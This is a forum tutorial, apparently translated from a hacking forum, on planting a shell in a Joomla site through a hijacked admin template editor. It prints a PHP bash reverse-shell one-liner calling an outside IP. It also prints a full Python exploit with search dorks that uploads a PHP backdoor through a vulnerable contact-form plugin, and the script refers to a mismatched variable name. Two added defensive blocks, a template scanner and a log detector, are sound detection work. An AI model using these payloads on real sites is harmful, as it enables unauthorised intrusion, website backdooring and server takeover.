Joomla Shell Upload

Hunter5x

Member
21 Nov 2021

Hello. In this article I will talk about uploading a shell to Joomla and the basic logic behind it. There are a lot of methods for uploading a shell to Joomla. We'll learn all of them.

Translated From: https://www.turkhackteam.org/konular/joomla-siteye-shell-atma.2014182/


What Is Joomla?

Joomla is an award-winning open source CMS (Content Management System) designed for creating websites and online apps.

It allows you to publish all kinds of documents, such as text, images, PDF, video and audio files, from anywhere with internet access, whenever you want, without requiring any technical skills.
It is written in PHP and uses a MySQL database to store your content. Its biggest competitor is WordPress, which is free software. More than 3% of all websites worldwide are built with Joomla.

Now let's move on to our topic.

Log in to the website, whose admin login details you have already found, from /administrator/. Login panels are usually located at this address.



After our login, this screen will show up.




It reports an error, but that does not prevent us from doing anything.




From the top dropdown menu, click Extensions > Templates > Templates.




Many directories from our target website will be shown. Edit index.php in one of these directories.
By adding our shell code to this file, we upload the shell. I have given index.php as an example; you can upload your shell into whichever directory you want.
But here we'll start a reverse shell.
Let's continue.

To start our reverse shell, we need to edit one of the PHP files, save the template and run it. Edit index.php, add the reverse shell code to it and start a netcat listener.




PHP:
<?php

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.181/444 0>&1' ");

?>

Click on the green "Save" button. The shell can now start; if it does not, click on "Template Preview".




And now we've got a reverse shell in Joomla. As you can see, WordPress and Joomla share the same method for getting a reverse shell. Both of these examples used a one-line reverse shell, but pentestmonkey has a PHP reverse shell tool that is more complex, or maybe even better, which can be found here.
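
The template edit described above leaves a modified PHP file on disk, which is where it can be caught. The scanner below is an added example, not part of the original post: it flags command-execution calls and bash network redirection in template files and reports files whose hash differs from a known-good baseline. The function names, the baseline format (relative path to SHA-256) and the directory layout are assumptions.

```python
import hashlib
import re
import sys
from pathlib import Path

# PHP command-execution calls; the lookbehind skips methods such as $db->exec()
# and longer names such as curl_exec().
EXEC_CALL = re.compile(
    r"(?<![\w>:$])(exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I)
# Bash network redirection of the kind used in the one-line payload.
DEV_TCP = re.compile(r"/dev/(tcp|udp)/[\w.\-]+/\d+")

def scan_php_source(text):
    """Return (line_no, reason, line) findings for one PHP source string."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        if DEV_TCP.search(line):
            findings.append((no, "network-redirect", line.strip()))
        elif EXEC_CALL.search(line):
            findings.append((no, "command-exec", line.strip()))
    return findings

def scan_tree(root):
    """Scan every .php file under root; return {relative_path: findings}."""
    root, report = Path(root), {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_php_source(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

def changed_files(root, baseline):
    """Return .php files whose SHA-256 is missing from or differs from baseline."""
    root, changed = Path(root), []
    for path in sorted(root.rglob("*.php")):
        rel = path.relative_to(root).as_posix()
        if baseline.get(rel) != hashlib.sha256(path.read_bytes()).hexdigest():
            changed.append(rel)
    return changed

if __name__ == "__main__":
    # Assumed usage: pass the site's templates directory as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for rel, hits in scan_tree(target).items():
        for no, reason, line in hits:
            print(f"{rel}:{no}: {reason}: {line}")
```

The pattern scan is a heuristic and misses obfuscated code; the hash comparison catches any edit to a template file regardless of its content.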

This way, you can upload or inject your malware or shell.

You don't have to use the reverse shell method, but I wanted to explain it to you because it is not only beneficial but also efficient.

In the normal method, you go to the index.php directory or whichever directory you want, then upload and save the shell code.

Then you can do whatever you want via the shell.

Let me give you this exploit, which uploads a shell automatically to both WordPress and Joomla websites.

You can use it if you wish; you will definitely see its benefits.

Python:
#!/usr/bin/python
#
# Exploit Name: Wordpress and Joomla Creative Contact Form Shell Upload Vulnerability
#               Wordpress plugin version: <= 0.9.7
#               Joomla extension version: <= 2.0.0
#
# Vulnerability discovered by Ghost Killer
#
# Exploit written by Ghost Killer
#
# Dork google wordpress:  inurl:inurl:ghost-contact-form
# Dork google joomla   :  inurl:com_creativecontactform
#
# Tested on BackBox 3.x
#
# http connection
import urllib, urllib2, sys, mimetypes
# Args management
import optparse
# file management
import os, os.path

# Check url
def checkurl(url):
    if url[:8] != "https://" and url[:7] != "http://":
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    else:
        return url

# Check if file exists and has readable
def checkfile(file):
    if not os.path.isfile(file) and not os.access(file, os.R_OK):
        print '[X] '+file+' file is missing or not readable'
        sys.exit(1)
    else:
        return file
# Get file's mimetype
def get_content_type(filename):
    return mimetypes.guess_type(filename)[0] or 'application/octet-stream'

# Create multipart header
def create_body_sh3ll_upl04d(payloadname):

   getfields = dict()

   payloadcontent = open(payloadname).read()

   LIMIT = '----------lImIt_of_THE_fIle_eW_$'
   CRLF = '\r\n'

   L = []
   for (key, value) in getfields.items():
      L.append('--' + LIMIT)
      L.append('Content-Disposition: form-data; name="%s"' % key)
      L.append('')
      L.append(value)

   L.append('--' + LIMIT)
   L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', payloadname))
   L.append('Content-Type: %s' % get_content_type(payloadname))
   L.append('')
   L.append(payloadcontent)
   L.append('--' + LIMIT + '--')
   L.append('')
   body = CRLF.join(L)
   return body

banner = """


                                                                        
                `---'                                                                         
                                                                                              

                                                     Cr3ative C0nt4ct Form Sh3ll Upl04d

                                     Discovered by:
                                    
                                       Ghost Killer - Anka Red Team

                                      Written by:

                                       Ghost Killer - Anka Red Team

                                 https://www.TurkHackTeam.ORG

                                       [email protected]

                            
                                    https://www.TurkHackTeam.ORG
                  
"""

commandList = optparse.OptionParser('usage: %prog -t URL -c CMS-f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
                  help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                  )
commandList.add_option('-c', '--cms', action="store",
                  help="Insert CMS Type: wordpress|joomla",
                  )
commandList.add_option('-f', '--file', action="store",
                  help="Insert file name, ex: shell.php",
                  )
commandList.add_option('--timeout', action="store", default=10, type="int",
                  help="[Timeout Value] - Default 10",
                  )

options, remainder = commandList.parse_args()

# Check args
if not options.target or not options.file or not options.cms:
    print(banner)
    commandList.print_help()
    sys.exit(1)

payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
cmstype = options.cms

print(banner)

if options.cms == "wordpress":
   url_sexy_upload = host+'/wp-content/plugins/ghost-contact-form/includes/fileupload/index.php'
   backdoor_location = host+'/wp-content/plugins/ghost-contact-form/includes/fileupload/files/'

elif options.cms == "joomla":
   url_sexy_upload = host+'/components/com_creativecontactform/fileupload/index.php'
   backdoor_location = host+'/components/com_creativecontactform/fileupload/files/'

else:
   print("[X] -c options require: 'wordpress' or 'joomla'")
   sys.exit(1)

content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'

bodyupload = create_body_sh3ll_upl04d(payloadname)

headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
           'content-type': content_type,
           'content-length': str(len(bodyupload)) }

try:
   req = urllib2.Request(url_ghost_upload, bodyupload, headers)
   response = urllib2.urlopen(req)

   if "error" in response.read():
      print("[X] Upload Failed :(")
   else:
      print("[!] Shell Uploaded")
      print("[!] "+backdoor_location+options.file)
except urllib2.HTTPError as e:
   print("[X] Http Error: "+str(e.code))
except urllib2.URLError as e:
   print("[X] Connection Error: "+str(e.code))

Thanks for reading, have a nice day.

Special Thanks To @Ghost Killer.
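
The upload handler and drop directory paths used by the script above are fixed, so requests to them stand out in web server access logs. The detector below is an added example, not part of the original post: it flags POSTs to those handlers and requests for script files served from the upload directories. It assumes Apache/nginx combined log format; the log lines are constructed samples and the function and alert names are hypothetical.

```python
import re

# Upload handler and drop directory paths named in the script above.
UPLOAD_HANDLERS = (
    "/components/com_creativecontactform/fileupload/index.php",
    "/wp-content/plugins/ghost-contact-form/includes/fileupload/index.php",
)
DROP_DIRS = (
    "/components/com_creativecontactform/fileupload/files/",
    "/wp-content/plugins/ghost-contact-form/includes/fileupload/files/",
)
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Combined log format: ip - user [time] "METHOD path proto" status ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def detect(lines):
    """Return alerts as (kind, ip, path) tuples, in log order."""
    alerts, uploaders = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, _ts, method, target, status = m.groups()
        path = target.split("?", 1)[0]  # ignore the query string
        if method == "POST" and path.endswith(UPLOAD_HANDLERS):
            uploaders.add(ip)
            alerts.append(("upload-post", ip, path))
        elif any(d in path for d in DROP_DIRS) and SCRIPT_EXT.search(path):
            # A script requested from the upload directory; 200 means it exists.
            kind = "script-executed" if status == "200" else "script-probe"
            if status == "200" and ip in uploaders:
                kind = "upload-then-execute"
            alerts.append((kind, ip, path))
    return alerts

# Constructed sample log lines (documentation-range addresses).
SAMPLE = [
    '203.0.113.7 - - [21/Nov/2021:10:00:01 +0000] "POST /components/com_creativecontactform/fileupload/index.php HTTP/1.1" 200 85 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Nov/2021:10:00:03 +0000] "GET /components/com_creativecontactform/fileupload/files/a.php?x=1 HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Nov/2021:10:05:00 +0000] "GET /components/com_creativecontactform/fileupload/files/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Nov/2021:10:06:00 +0000] "GET /wp-content/plugins/ghost-contact-form/includes/fileupload/files/x.phtml HTTP/1.1" 404 0 "-" "curl/7.0"',
]

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

Blocking PHP execution in upload directories at the web server level removes the second stage entirely, since an uploaded script is then served as plain text or refused.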




 